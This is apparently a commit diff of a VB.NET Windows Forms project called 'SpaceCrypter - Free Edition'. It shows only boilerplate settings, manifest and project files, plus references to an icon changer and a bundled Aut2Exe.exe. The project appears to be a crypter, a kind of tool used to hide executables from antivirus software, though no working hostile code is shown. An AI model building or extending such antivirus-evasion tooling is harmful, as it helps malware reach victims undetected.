<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
|
||||
Friend ReadOnly Property Settings() As Global.SpaceCrypter___Free_Edition.My.MySettings
|
||||
Get
|
||||
Return Global.SpaceCrypter___Free_Edition.My.MySettings.Default
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
+7
@@ -0,0 +1,7 @@
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
|
||||
<Profiles>
|
||||
<Profile Name="(Default)" />
|
||||
</Profiles>
|
||||
<Settings />
|
||||
</SettingsFile>
|
||||
+76
@@ -0,0 +1,76 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
|
||||
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
|
||||
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
|
||||
<security>
|
||||
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
|
||||
<!-- Options du manifeste de contrôle de compte d'utilisateur
|
||||
Si vous souhaitez modifier le niveau du contrôle de compte d'utilisateur Windows, remplacez le
|
||||
nœud requestedExecutionLevel par l'une des propositions suivantes.
|
||||
|
||||
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
|
||||
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
|
||||
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
|
||||
|
||||
La spécification de l'élément requestedExecutionLevel désactive la virtualisation de fichiers et du Registre.
|
||||
Supprimez cet élément si votre application a besoin de la virtualisation pour des
|
||||
raisons de compatibilité descendante.
|
||||
-->
|
||||
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
|
||||
</requestedPrivileges>
|
||||
</security>
|
||||
</trustInfo>
|
||||
|
||||
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
|
||||
<application>
|
||||
<!-- Liste des versions de Windows pour lesquelles cette application a été testée, et sur
|
||||
lesquelles elle doit fonctionner. Supprimez les marques de commentaire des éléments appropriés, et Windows va
|
||||
automatiquement sélectionner l'environnement le plus compatible. -->
|
||||
|
||||
<!-- Windows Vista -->
|
||||
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
|
||||
|
||||
<!-- Windows 7 -->
|
||||
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
|
||||
|
||||
<!-- Windows 8 -->
|
||||
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
|
||||
|
||||
<!-- Windows 8.1 -->
|
||||
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
|
||||
|
||||
<!-- Windows 10 -->
|
||||
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
|
||||
|
||||
</application>
|
||||
</compatibility>
|
||||
|
||||
<!-- Indique que l'application prend en charge DPI et qu'elle n'est pas automatiquement mise à l'échelle par Windows à un niveau de
|
||||
DPI plus élevé. Les applications Windows Presentation Foundation (WPF) prennent automatiquement en charge DPI et n'ont pas besoin
|
||||
d'opter pour ce choix. Les applications Windows Forms qui ciblent .NET Framework 4.6 et qui optent pour ce paramètre, doivent
|
||||
également affecter la valeur 'true' au paramètre 'EnableWindowsFormsHighDpiAutoResizing' dans leur fichier app.config. -->
|
||||
<!--
|
||||
<application xmlns="urn:schemas-microsoft-com:asm.v3">
|
||||
<windowsSettings>
|
||||
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
|
||||
</windowsSettings>
|
||||
</application>
|
||||
-->
|
||||
|
||||
<!-- Activer les thèmes pour les contrôles et boîtes de dialogue communes de Windows (Windows XP et version ultérieure) -->
|
||||
<!--
|
||||
<dependency>
|
||||
<dependentAssembly>
|
||||
<assemblyIdentity
|
||||
type="win32"
|
||||
name="Microsoft.Windows.Common-Controls"
|
||||
version="6.0.0.0"
|
||||
processorArchitecture="*"
|
||||
publicKeyToken="6595b64144ccf1df"
|
||||
language="*"
|
||||
/>
|
||||
</dependentAssembly>
|
||||
</dependency>
|
||||
-->
|
||||
|
||||
</assembly>
|
||||
Binary file not shown.
+145
@@ -0,0 +1,145 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{D206B0A2-4C04-468C-8090-DDBAF65E757D}</ProjectGuid>
|
||||
<OutputType>WinExe</OutputType>
|
||||
<StartupObject>SpaceCrypter___Free_Edition.My.MyApplication</StartupObject>
|
||||
<RootNamespace>SpaceCrypter___Free_Edition</RootNamespace>
|
||||
<AssemblyName>SpaceCrypter - Free Edition</AssemblyName>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<MyType>WindowsForms</MyType>
|
||||
<TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
|
||||
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<DefineDebug>true</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<DefineDebug>false</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionExplicit>On</OptionExplicit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionCompare>Binary</OptionCompare>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionStrict>Off</OptionStrict>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionInfer>On</OptionInfer>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<ApplicationIcon>protection.ico</ApplicationIcon>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<ApplicationManifest>My Project\app.manifest</ApplicationManifest>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Deployment" />
|
||||
<Reference Include="System.Drawing" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
<Reference Include="System.Xml" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
<Reference Include="System.Net.Http" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Import Include="Microsoft.VisualBasic" />
|
||||
<Import Include="System" />
|
||||
<Import Include="System.Collections" />
|
||||
<Import Include="System.Collections.Generic" />
|
||||
<Import Include="System.Data" />
|
||||
<Import Include="System.Drawing" />
|
||||
<Import Include="System.Diagnostics" />
|
||||
<Import Include="System.Windows.Forms" />
|
||||
<Import Include="System.Linq" />
|
||||
<Import Include="System.Xml.Linq" />
|
||||
<Import Include="System.Threading.Tasks" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Classe\ChangerDicon.vb" />
|
||||
<Compile Include="Form1.vb">
|
||||
<SubType>Form</SubType>
|
||||
</Compile>
|
||||
<Compile Include="Form1.Designer.vb">
|
||||
<DependentUpon>Form1.vb</DependentUpon>
|
||||
<SubType>Form</SubType>
|
||||
</Compile>
|
||||
<Compile Include="My Project\AssemblyInfo.vb" />
|
||||
<Compile Include="My Project\Application.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Application.myapp</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Resources.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DesignTime>True</DesignTime>
|
||||
<DependentUpon>Resources.resx</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Settings.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Settings.settings</DependentUpon>
|
||||
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
||||
</Compile>
|
||||
<Compile Include="Classe\RandomPool.vb">
|
||||
<SubType>Component</SubType>
|
||||
</Compile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<EmbeddedResource Include="Form1.resx">
|
||||
<DependentUpon>Form1.vb</DependentUpon>
|
||||
</EmbeddedResource>
|
||||
<EmbeddedResource Include="My Project\Resources.resx">
|
||||
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
|
||||
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
|
||||
<CustomToolNamespace>My.Resources</CustomToolNamespace>
|
||||
<SubType>Designer</SubType>
|
||||
</EmbeddedResource>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="My Project\app.manifest" />
|
||||
<None Include="My Project\Application.myapp">
|
||||
<Generator>MyApplicationCodeGenerator</Generator>
|
||||
<LastGenOutput>Application.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="My Project\Settings.settings">
|
||||
<Generator>SettingsSingleFileGenerator</Generator>
|
||||
<CustomToolNamespace>My</CustomToolNamespace>
|
||||
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Content Include="protection.ico" />
|
||||
<None Include="Resources\Aut2Exe.exe" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
|
||||
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
||||
Other similar extension points exist, see Microsoft.Common.targets.
|
||||
<Target Name="BeforeBuild">
|
||||
</Target>
|
||||
<Target Name="AfterBuild">
|
||||
</Target>
|
||||
-->
|
||||
</Project>
|
||||
Binary file not shown.
|
After Width: | Height: | Size: 31 KiB |
Reference in New Issue
Block a user